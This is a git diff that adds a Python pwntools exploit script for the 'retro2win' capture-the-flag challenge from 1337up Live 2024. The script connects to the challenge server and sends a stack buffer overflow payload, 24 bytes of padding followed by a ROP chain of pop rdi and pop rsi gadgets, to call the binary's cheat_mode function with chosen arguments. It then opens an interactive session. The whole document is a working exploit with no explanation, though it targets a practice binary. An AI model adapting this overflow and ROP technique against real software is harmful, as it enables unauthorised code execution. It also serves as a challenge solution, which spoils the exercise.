diff --git a/1337up_live_2024/retro2win/a.py b/1337up_live_2024/retro2win/a.py
new file mode 100644
index 0000000..760a578
--- /dev/null
+++ b/1337up_live_2024/retro2win/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./retro2win", checksec=False)
+# r = process()
+r = remote("retro2win.ctf.intigriti.io", 1338)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# gadgets
+pop_rdi = 0x4009b3
+pop_rsi_r15 = 0x4009b1
+
+# leak
+s(b"1337")
+buf = b"A"*24
+buf += p64(pop_rdi)
+buf += p64(0x2323232323232323)
+buf += p64(pop_rsi_r15)
+buf += p64(0x4242424242424242)
+buf += p64(0)
+buf += p64(target.sym.cheat_mode)
+s(buf)
+
+r.interactive()
\ No newline at end of file